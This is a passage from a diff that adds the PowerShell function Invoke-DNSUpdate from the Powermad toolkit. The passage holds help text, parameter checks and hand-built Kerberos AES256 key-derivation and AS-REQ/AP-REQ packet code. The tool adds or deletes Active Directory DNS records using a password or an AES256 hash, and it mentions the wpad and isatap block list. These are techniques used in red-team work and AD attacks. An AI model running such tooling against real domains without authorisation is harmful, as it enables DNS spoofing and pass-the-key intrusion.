+ The second method performs Kerberos authentication using just PowerShell code over a TCPClient connection. This method
+ will accept a password or AES256 hash and will not place any tickets in the client side cache.
+
+ In the event that a zone is configured for nonsecure dynamic updates, you should have full control over the zone.
+
+ Note that wpad and isatap are on a block list by default starting with Server 2008. Although the records can be added
+ with both secure and nonsecure dynamic updates, AD DNS will not answer requests for wpad and isatap if they are listed
+ on the block list.
+
+ .PARAMETER DomainController
+ Domain controller to target in FQDN format.
+
+ .PARAMETER Realm
+ Kerberos realm.
+
+ .PARAMETER Username
+ Username of user with DNS secure dynamic update access. If using a machine account, the trailing '$' must be
+ included.
+
+ .PARAMETER Password
+ Password of user with DNS secure dynamic update access. The password must be in the form of a secure string.
+
+ .PARAMETER Hash
+ AES256 password hash for user with DNS secure dynamic update access. Note that this will use Kerberos
+ authentication built on top of TCPClient.
+
+ .PARAMETER Security
+ Default = Secure: (Auto/Nonsecure/Secure) Dynamic update security type. Auto will attempt to use nonsecure. If
+ nonsecure fails, secure will be used. This is the standard dynamic update behavior. Secure is the default
+ because it generates less traffic.
+
+ .PARAMETER DNSName
+ DNS record name.
+
+ .PARAMETER DNSData
+ DNS records data. For most record types this will be the destination hostname or IP address. For TXT records
+ this can be used for data. If deleting a record, leave off this parameter.
+
+ .PARAMETER DNSType
+ DNS record type.
+
+ .PARAMETER DNSTTL
+ DNS record TTL.
+
+ .PARAMETER DNSPreference
+ DNS MX record priority
+
+ .PARAMETER DNSPriority
+ DNS SRV record priority.
+
+ .PARAMETER DNSWeight
+ DNS SRV record weight.
+
+ .PARAMETER DNSPort
+ DNS SRV record port.
+
+ .PARAMETER DNSZone
+ DNS zone.
+
+ .PARAMETER TCPClientAuth
+ Switch to force usage of the TCPClient based Kerberos authentication.
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType A -DNSName www.test.local -DNSData 192.168.100.125 -DNSTTL 84600
+ Add A Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType AAAA -DNSName www.test.local -DNSData 2001:0db8:85a3:0000:0000:8a2e:0370:7334
+ Add AAAA Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType CNAME -DNSName www.test.local -DNSData system.test.local
+ Add CNAME Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType MX -DNSName test.local -DNSData 192.168.100.125 -DNSPreference 10
+ Add MX Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType PTR -DNSName 125.100.168.192.in-addr.arpa -DNSData www.test.local -DNSZone 100.168.192.in-addr.arpa
+ Add PTR Record - there is a good chance this will be denied if there is an existing record for an IP
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType SRV -DNSName _autodiscover._tcp.lab.local -DNSData system.test.local -DNSPriority 100 -DNSWeight 80 -DNSPort 443
+ Add SRV Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType TXT -DNSName host.test.local -DNSData "some text"
+ Add TXT Record
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType TXT -DNSName host.test.local
+ Delete TXT record - all deletes follow the same format, just specify DNSType and DNSName
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType A -DNSName www.test.local -Username testuser
+ Add A record using another account
+
+ .EXAMPLE
+ Invoke-DNSUpdate -DNSType A -DNSName www.test.local -Username testuser -Hash 0C27E0A5B0D69640B40DDED4A28EB3BB0D157659EBED2816A41A8228E98D111B
+ Add A record using another account and an AES256 hash
+
+ .LINK
+ https://github.com/Kevin-Robertson/Powermad
+ #>
+
+ [CmdletBinding()]
+ param
+ (
+ [parameter(Mandatory=$false)][String]$DomainController,
+ [parameter(Mandatory=$false)][String]$Realm,
+ [parameter(Mandatory=$false)][String]$Username,
+ [parameter(Mandatory=$false)][System.Security.SecureString]$Password,
+ [parameter(Mandatory=$false)][ValidateScript({$_.Length -eq 64})][String]$Hash,
+ [parameter(Mandatory=$false)][String]$DNSZone,
+ [parameter(Mandatory=$false)][Int]$DNSTTL = 600,
+ [parameter(Mandatory=$false)][Int]$DNSPreference,
+ [parameter(Mandatory=$false)][Int]$DNSPriority,
+ [parameter(Mandatory=$false)][Int]$DNSWeight,
+ [parameter(Mandatory=$false)][Int]$DNSPort,
+ [parameter(Mandatory=$false)][ValidateSet("Auto","Nonsecure","Secure")][String]$Security = "Secure",
+ [parameter(Mandatory=$true)][ValidateSet("A","AAAA","CNAME","MX","PTR","SRV","TXT")][String]$DNSType,
+ [parameter(Mandatory=$true)][String]$DNSName,
+ [parameter(Mandatory=$false)][ValidateScript({$_.Length -le 255})][String]$DNSData,
+ [parameter(Mandatory=$false)][Switch]$TCPClientAuth
+ )
+
+ if($TCPClientAuth -and !$Username)
+ {
+ Write-Output "[-] TCPClientAuth requires a username"
+ throw
+ }
+
+ switch ($DNSType)
+ {
+
+ 'MX'
+ {
+
+ if(!$DNSPreference)
+ {
+ Write-Output "[-] MX records require a DNSPreference"
+ throw
+ }
+
+ }
+
+ 'PTR'
+ {
+
+ if(!$DNSZone)
+ {
+ Write-Output "[-] PTR records require a DNSZone"
+ throw
+ }
+
+ }
+
+ 'SRV'
+ {
+
+ if(!$DNSPriority -and !$DNSWeight -and !$DNSPort -and $DNSData)
+ {
+ Write-Output "[-] DNSType SRV requires DNSPriority, DNSWeight, and DNSPort"
+ throw
+ }
+
+ if($DNSName -notlike '*._tcp.*' -and $DNSName -notlike '*._udp.*')
+ {
+ Write-Output "[-] DNSName doesn't contain a protocol"
+ throw
+ }
+
+ }
+
+ }
+
+ if($Username -and !$Hash)
+ {
+ $password = Read-Host -Prompt "Enter password" -AsSecureString
+ }
+
+ if(!$DomainController)
+ {
+
+ try
+ {
+ $current_domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
+ $DomainController = $current_domain.DomainControllers[0].Name
+ $domain = $current_domain.Name
+ }
+ catch
+ {
+ Write-Output "[-] Domain controller not located"
+ throw
+ }
+
+ }
+ else
+ {
+ $realm_index = $DomainController.IndexOf(".")
+ $domain = $DomainController.Substring($realm_index + 1)
+ }
+
+ if(!$Realm)
+ {
+ $realm = $domain
+ }
+
+ if($TCPClientAuth -or $Hash)
+ {
+
+ $kerberos_tcpclient = $true
+ $realm = $realm.ToUpper()
+
+ if($username -like "*\*")
+ {
+ $username = $username.SubString(($username.IndexOf("\") + 1),($username.Length - ($username.IndexOf("\") + 1)))
+ }
+
+ if($username -like "*@*")
+ {
+ $username = $username.SubString(0,($username.IndexOf("@")))
+ }
+
+ if($Username.EndsWith("$"))
+ {
+ $salt = $realm + "host" + $Username.SubString(0,$Username.Length - 1) + "." + $realm.ToLower()
+ }
+ else
+ {
+ $salt = $realm + $Username
+ }
+
+ Write-Verbose "[+] Salt $salt"
+ }
+
+ if(!$DNSZone)
+ {
+ $DNSZone_index = $DomainController.IndexOf(".")
+ $DNSZone = $DomainController.Substring($DNSZone_index + 1)
+ }
+
+ $DNSZone = $DNSZone.ToLower()
+
+ function ConvertFrom-PacketOrderedDictionary
+ {
+ param($ordered_dictionary)
+
+ ForEach($field in $ordered_dictionary.Values)
+ {
+ $byte_array += $field
+ }
+
+ return $byte_array
+ }
+
+ function Get-KerberosAES256UsageKey
+ {
+ param([String]$key_type,[Int]$usage_number,[Byte[]]$base_key)
+
+ $padding = 0x00 * 16
+
+ if($key_type -eq 'checksum')
+ {
+ switch($usage_number)
+ {
+ 25 {[Byte[]]$usage_constant = 0x5d,0xfb,0x7d,0xbf,0x53,0x68,0xce,0x69,0x98,0x4b,0xa5,0xd2,0xe6,0x43,0x34,0xba + $padding}
+ }
+ }
+ elseif($key_type -eq 'encrypt')
+ {
+
+ switch($usage_number)
+ {
+ 1 {[Byte[]]$usage_constant = 0xae,0x2c,0x16,0x0b,0x04,0xad,0x50,0x06,0xab,0x55,0xaa,0xd5,0x6a,0x80,0x35,0x5a + $padding}
+ 3 {[Byte[]]$usage_constant = 0xbe,0x34,0x9a,0x4d,0x24,0xbe,0x50,0x0e,0xaf,0x57,0xab,0xd5,0xea,0x80,0x75,0x7a + $padding}
+ 4 {[Byte[]]$usage_constant = 0xc5,0xb7,0xdc,0x6e,0x34,0xc7,0x51,0x12,0xb1,0x58,0xac,0x56,0x2a,0x80,0x95,0x8a + $padding}
+ 7 {[Byte[]]$usage_constant = 0xde,0x44,0xa2,0xd1,0x64,0xe0,0x51,0x1e,0xb7,0x5b,0xad,0xd6,0xea,0x80,0xf5,0xba + $padding}
+ 11 {[Byte[]]$usage_constant = 0xfe,0x54,0xaa,0x55,0xa5,0x02,0x52,0x2f,0xbf,0x5f,0xaf,0xd7,0xea,0x81,0x75,0xfa + $padding}
+ 12 {[Byte[]]$usage_constant = 0x05,0xd7,0xec,0x76,0xb5,0x0b,0x53,0x33,0xc1,0x60,0xb0,0x58,0x2a,0x81,0x96,0x0b + $padding}
+ }
+
+ }
+ elseif($key_type -eq 'integrity')
+ {
+
+ switch($usage_number)
+ {
+ 1 {[Byte[]]$usage_constant = 0x5b,0x58,0x2c,0x16,0x0a,0x5a,0xa8,0x05,0x56,0xab,0x55,0xaa,0xd5,0x40,0x2a,0xb5 + $padding}
+ 4 {[Byte[]]$usage_constant = 0x72,0xe3,0xf2,0x79,0x3a,0x74,0xa9,0x11,0x5c,0xae,0x57,0x2b,0x95,0x40,0x8a,0xe5 + $padding}
+ 7 {[Byte[]]$usage_constant = 0x8b,0x70,0xb8,0xdc,0x6a,0x8d,0xa9,0x1d,0x62,0xb1,0x58,0xac,0x55,0x40,0xeb,0x15 + $padding}
+ 11 {[Byte[]]$usage_constant = 0xab,0x80,0xc0,0x60,0xaa,0xaf,0xaa,0x2e,0x6a,0xb5,0x5a,0xad,0x55,0x41,0x6b,0x55 + $padding}
+ }
+
+ }
+
+ $AES = New-Object "System.Security.Cryptography.AesManaged"
+ $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
+ $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
+ $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $AES.KeySize = 256
+ $AES.Key = $base_key
+ $AES_encryptor = $AES.CreateEncryptor()
+ $usage_key = $AES_encryptor.TransformFinalBlock($usage_constant,0,$usage_constant.Length)
+
+ return $usage_key
+ }
+
+ # TCPClient Kerberos start - this section can be removed if not using a hash or -TCPClientAuth
+ function Get-KerberosAES256BaseKey
+ {
+ param([String]$salt,[System.Security.SecureString]$password)
+
+ $password_BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password)
+ $password_cleartext = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($password_BSTR)
+ [Byte[]]$salt = [System.Text.Encoding]::UTF8.GetBytes($salt)
+ [Byte[]]$password_cleartext = [System.Text.Encoding]::UTF8.GetBytes($password_cleartext)
+ $constant = 0x6B,0x65,0x72,0x62,0x65,0x72,0x6F,0x73,0x7B,0x9B,0x5B,0x2B,0x93,0x13,0x2B,0x93,0x5C,0x9B,0xDC,0xDA,0xD9,0x5C,0x98,0x99,0xC4,0xCA,0xE4,0xDE,0xE6,0xD6,0xCA,0xE4
+ $PBKDF2 = New-Object Security.Cryptography.Rfc2898DeriveBytes($password_cleartext,$salt,4096)
+ Remove-Variable password_cleartext
+ $PBKDF2_key = $PBKDF2.GetBytes(32)
+ $AES = New-Object "System.Security.Cryptography.AesManaged"
+ $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
+ $AES.Padding = [System.Security.Cryptography.PaddingMode]::None
+ $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
+ $AES.KeySize = 256
+ $AES.Key = $PBKDF2_key
+ $AES_encryptor = $AES.CreateEncryptor()
+ $base_key_part_1 = $AES_encryptor.TransformFinalBlock($constant,0,$constant.Length)
+ $base_key_part_2 = $AES_encryptor.TransformFinalBlock($base_key_part_1,0,$base_key_part_1.Length)
+ $base_key = $base_key_part_1[0..15] + $base_key_part_2[0..15]
+
+ return $base_key
+ }
+
+ function New-PacketKerberosASREQ()
+ {
+ param([Byte[]]$username,[Byte[]]$realm,[Byte[]]$namestring,[Byte[]]$nonce,[Byte[]]$pac,[Byte[]]$pac_signature)
+
+ $timestamp = Get-Date
+ $till = $timestamp.AddYears(20)
+ $timestamp = ("{0:u}" -f $timestamp) -replace "-","" -replace " ","" -replace ":",""
+ $till = ("{0:u}" -f $till) -replace "-","" -replace " ","" -replace ":",""
+ [Byte[]]$timestamp = [System.Text.Encoding]::UTF8.GetBytes($timestamp)
+ [Byte[]]$till = [System.Text.Encoding]::UTF8.GetBytes($till)
+
+ if($pac)
+ {
+ $pac_extra_length = 78
+ }
+
+ [Byte[]]$namestring1_length = Get-ASN1LengthArray $namestring.Count
+ [Byte[]]$namestring_length = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + 6)
+ [Byte[]]$namestring_length2 = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + 7)
+ [Byte[]]$sname_length = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + 13)
+ [Byte[]]$sname_length2 = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + 14)
+ [Byte[]]$realm_length = Get-ASN1LengthArray $realm.Count
+ [Byte[]]$realm_length2 = Get-ASN1LengthArray ($realm.Count + $realm_length.Count + 1)
+ [Byte[]]$cname_length = Get-ASN1LengthArray $username.Count
+ [Byte[]]$cname_length2 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + 1)
+ [Byte[]]$cname_length3 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + 2)
+ [Byte[]]$cname_length4 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + 8)
+ [Byte[]]$cname_length5 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + 9)
+ $grouped_length = $address_length.Count + $address_length2.Count + $address_length3.Count + $address_length4.Count + $address_length5.Count + $namestring.Count +
+ $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count + $realm.Count + $realm_length.Count +
+ $realm_length2.Count + $username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count
+ [Byte[]]$reqbody_length = Get-ASN1LengthArrayLong ($grouped_length + 86)
+ [Byte[]]$reqbody_length2 = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + 87)
+ [Byte[]]$message_length = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $pac_extra_length + 114)
+ [Byte[]]$message_length2 = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $message_length.Count + $pac_extra_length + 115)
+ [Byte[]]$asreq_length = [System.BitConverter]::GetBytes($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $message_length.Count + $message_length2.Count +
+ $pac_extra_length + 116)[3..0]
+
+ $packet_KerberosASREQ = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_KerberosASREQ.Add("Length",$asreq_length)
+ $packet_KerberosASREQ.Add("Message_Encoding",[Byte[]](0x6a) + $message_length2 + [Byte[]](0x30) + $message_length)
+ $packet_KerberosASREQ.Add("Message_PVNO_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
+ $packet_KerberosASREQ.Add("Message_PVNO",[Byte[]](0x05))
+ $packet_KerberosASREQ.Add("Message_MSGType_Encoding",[Byte[]](0xa2,0x03,0x02,0x01))
+ $packet_KerberosASREQ.Add("Message_MSGType",[Byte[]](0x0a))
+
+ if($pac)
+ {
+ $packet_KerberosASREQ.Add("Message_PAData_Encoding",[Byte[]](0xa3,0x5c,0x30,0x5a,0x30,0x4c,0xa1,0x03,0x02,0x01,0x02))
+ $packet_KerberosASREQ.Add("Message_PAData0_Type_Encoding",[Byte[]](0xa2,0x45,0x04,0x43,0x30,0x41,0xa0,0x03,0x02,0x01))
+ $packet_KerberosASREQ.Add("Message_PAData0_Type",[Byte[]](0x12))
+ $packet_KerberosASREQ.Add("Message_PAData0_Value_Encoding",[Byte[]](0xa2,0x3a,0x04,0x38))
+ $packet_KerberosASREQ.Add("Message_PAData0_Value",$pac)
+ $packet_KerberosASREQ.Add("Message_PAData0_Signature",$pac_signature)
+ $packet_KerberosASREQ.Add("Message_PAData1_Type_Encoding",[Byte[]](0x30,0x0a,0xa1,0x04,0x02,0x02))
+ }
+ else
+ {
+ $packet_KerberosASREQ.Add("Message_PAData_Encoding",[Byte[]](0xa3,0x0e,0x30,0x0c,0x30,0x0a))
+ $packet_KerberosASREQ.Add("Message_PAData1_Type_Encoding",[Byte[]](0xa1,0x04,0x02,0x02))
+ }
+
+ $packet_KerberosASREQ.Add("Message_PAData1_Type",[Byte[]](0x00,0x95))
+ $packet_KerberosASREQ.Add("Message_PAData1_Value_Encoding",[Byte[]](0xa2,0x02,0x04))
+ $packet_KerberosASREQ.Add("Message_PAData1_Value",[Byte[]](0x00))
+ $packet_KerberosASREQ.Add("Message_REQBody_Encoding",[Byte[]](0xa4) + $reqbody_length2 + [Byte[]](0x30) + $reqbody_length)
+ $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions_Encoding",[Byte[]](0xa0,0x07,0x03,0x05))
+ $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions_Padding",[Byte[]](0x00))
+ $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions",[Byte[]](0x50,0x00,0x00,0x00))
+ $packet_KerberosASREQ.Add("Message_REQBody_CName_Encoding",[Byte[]](0xa1) + $cname_length5 + [Byte[]](0x30) + $cname_length4)
+ $packet_KerberosASREQ.Add("Message_REQBody_CName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosASREQ.Add("Message_REQBody_CName_NameType",[Byte[]](0x01))
+ $packet_KerberosASREQ.Add("Message_REQBody_CName_NameString_Encoding",[Byte[]](0xa1) + $cname_length3 + [Byte[]](0x30) + $cname_length2 + [Byte[]](0x1b) + $cname_length)
+ $packet_KerberosASREQ.Add("Message_REQBody_CName_NameString",$username)
+ $packet_KerberosASREQ.Add("Message_REQBody_Realm_Encoding",[Byte[]](0xa2) + $realm_length2 + [Byte[]](0x1b) + $realm_length)
+ $packet_KerberosASREQ.Add("Message_REQBody_Realm",$realm)
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_Encoding",[Byte[]](0xa3) + $sname_length2 + [Byte[]](0x30) + $sname_length)
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameType",[Byte[]](0x01))
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString_Encoding",[Byte[]](0xa1) + $namestring_length2 + [Byte[]](0x30) + $namestring_length)
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString0_Encoding",[Byte[]](0x1b,0x03))
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString0",[Byte[]](0x44,0x4e,0x53))
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString1_Encoding",[Byte[]](0x1b) + $namestring1_length) #50
+ $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString1",$namestring)
+ $packet_KerberosASREQ.Add("Message_REQBody_Till_Encoding",[Byte[]](0xa5,0x11,0x18,0x0f))
+ $packet_KerberosASREQ.Add("Message_REQBody_Till",$till)
+ $packet_KerberosASREQ.Add("Message_REQBody_Nonce_Encoding",[Byte[]](0xa7,0x06,0x02,0x04))
+ $packet_KerberosASREQ.Add("Message_REQBody_Nonce",$nonce)
+ $packet_KerberosASREQ.Add("Message_REQBody_EType_Encoding",[Byte[]](0xa8,0x15,0x30,0x13))
+ $packet_KerberosASREQ.Add("Message_REQBody_EType",[Byte[]](0x02,0x01,0x12,0x02,0x01,0x11,0x02,0x01,0x17,0x02,0x01,0x18,0x02,0x02,0xff,0x79,0x02,0x01,0x03))
+
+ return $packet_KerberosASREQ
+ }
+
+ function New-PacketKerberosAPREQ()
+ {
+ param([Byte[]]$realm,[Byte[]]$spn,[Byte[]]$kvno,[Byte[]]$ticket,[Byte[]]$authenticator,[Byte[]]$authenticator_signature)
+
+ $authenticator += $authenticator_signature
+ $parameter_length = $realm.Count + $spn.Count + $ticket.Count + $authenticator.Count
+ [Byte[]]$authenticator_length = Get-ASN1LengthArrayLong $authenticator.Count
+ [Byte[]]$authenticator_length2 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + 1)
+ [Byte[]]$authenticator_length3 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + $authenticator_length2.Count + 7)
+ [Byte[]]$authenticator_length4 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + $authenticator_length2.Count + $authenticator_length3.Count + 8)
+ [Byte[]]$ticket_length = Get-ASN1LengthArrayLong $ticket.Count
+ [Byte[]]$ticket_length2 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + 1)
+ [Byte[]]$ticket_length3 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + 12)
+ [Byte[]]$ticket_length4 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + 13)
+ [Byte[]]$namestring1_length = Get-ASN1LengthArray $spn.Count
+ [Byte[]]$namestring_length = Get-ASN1LengthArray ($spn.Count + $namestring_length.Count + 4)
+ [Byte[]]$namestring_length2 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + 5)
+ [Byte[]]$sname_length = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + 4)
+ [Byte[]]$sname_length2 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + 5)
+ [Byte[]]$sname_length3 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count + 11)
+ [Byte[]]$sname_length4 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + 12)
+ [Byte[]]$realm_length = Get-ASN1LengthArray $realm.Count
+ [Byte[]]$realm_length2 = Get-ASN1LengthArray ($realm.Count + $realm_length.Count + 1)
+ [Byte[]]$ticket_length5 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
+ $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + 34)
+ [Byte[]]$ticket_length6 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
+ $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + 35)
+ [Byte[]]$ticket_length7 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
+ $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + 36)
+ [Byte[]]$apreq_length = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
+ $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count + 73)
+ [Byte[]]$apreq_length2 = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
+ $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count +
+ $apreq_length.Count + 74)
+ [Byte[]]$length = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
+ $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
+ $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count +
+ $apreq_length.Count + $apreq_length2.Count + 88)
+
+ $packet_KerberosAPREQ = New-Object System.Collections.Specialized.OrderedDictionary
+ $packet_KerberosAPREQ.Add("Length",([Byte[]](0x60) + $length))
+ $packet_KerberosAPREQ.Add("MechToken_ThisMech",[Byte[]](0x06,0x09,0x2a,0x86,0x48,0x86,0xf7,0x12,0x01,0x02,0x02))
+ $packet_KerberosAPREQ.Add("MechToken_TokenID",[Byte[]](0x01,0x00))
+ $packet_KerberosAPREQ.Add("APReq_Encoding",[Byte[]](0x6e) + $apreq_length2 + [Byte[]](0x30) + $apreq_length)
+ $packet_KerberosAPREQ.Add("PVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("PVNO",[Byte[]]0x05)
+ $packet_KerberosAPREQ.Add("MSGType_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("MSGType",[Byte[]](0x0e))
+ $packet_KerberosAPREQ.Add("Padding_Encoding",[Byte[]](0xa2,0x07,0x03,0x05))
+ $packet_KerberosAPREQ.Add("Padding",[Byte[]](0x00))
+ $packet_KerberosAPREQ.Add("APOptions",[Byte[]](0x20,0x00,0x00,0x00))
+ $packet_KerberosAPREQ.Add("Ticket_Encoding",[Byte[]](0xa3) + $ticket_length7 + [Byte[]](0x61) + $ticket_length6 + [Byte[]](0x30) + $ticket_length5)
+ $packet_KerberosAPREQ.Add("Ticket_TKTVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("Ticket_TKTVNO",[Byte[]](0x05))
+ $packet_KerberosAPREQ.Add("Ticket_Realm_Encoding",[Byte[]](0xa1) + $realm_length2 + [Byte[]](0x1b) + $realm_length)
+ $packet_KerberosAPREQ.Add("Ticket_Realm",$realm)
+ $packet_KerberosAPREQ.Add("Ticket_SName_Encoding",[Byte[]](0xa2) + $sname_length4 + [Byte[]](0x30) + $sname_length3)
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameType",[Byte[]](0x01))
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameString_Encoding",[Byte[]](0xa1) + $sname_length2 + [Byte[]](0x30) + $sname_length)
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameString0_Encoding",[Byte[]](0x1b,0x03))
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameString0",[Byte[]](0x44,0x4e,0x53))
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameString1_Encoding",[Byte[]](0x1b) + $namestring1_length)
+ $packet_KerberosAPREQ.Add("Ticket_SName_NameString1",$spn)
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_Encoding",[Byte[]](0xa3) + $ticket_length4 + [Byte[]](0x30) + $ticket_length3)
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_EType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_EType",[Byte[]](0x12))
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_KVNO_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_KVNO",$kvno)
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_Cipher_Encoding",[Byte[]](0xa2) + $ticket_length2 + [Byte[]](0x04) + $ticket_length)
+ $packet_KerberosAPREQ.Add("Ticket_EncPart_Cipher",$ticket)
+ $packet_KerberosAPREQ.Add("Authenticator_Encoding",[Byte[]](0xa4) + $authenticator_length4 + [Byte[]](0x30) + $authenticator_length3)
+ $packet_KerberosAPREQ.Add("Authenticator_EType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
+ $packet_KerberosAPREQ.Add("Authenticator_EType",[Byte[]](0x12))
+ $packet_KerberosAPREQ.Add("Authenticator_Cipher_Encoding",[Byte[]](0xa2) + $authenticator_length2 + [Byte[]](0x04) + $authenticator_length)
+ $packet_KerberosAPREQ.Add("Authenticator_Cipher",$authenticator)
+
+ return $packet_KerberosAPREQ
+ }
+
+ function Unprotect-KerberosASREP
+ {
+ param([Byte[]]$ke_key,[Byte[]]$encrypted_data)
+
+ $final_block_length = [Math]::Truncate($encrypted_data.Count % 16)
+ [Byte[]]$final_block = $encrypted_data[($encrypted_data.Count - $final_block_length)..$encrypted_data.Count]
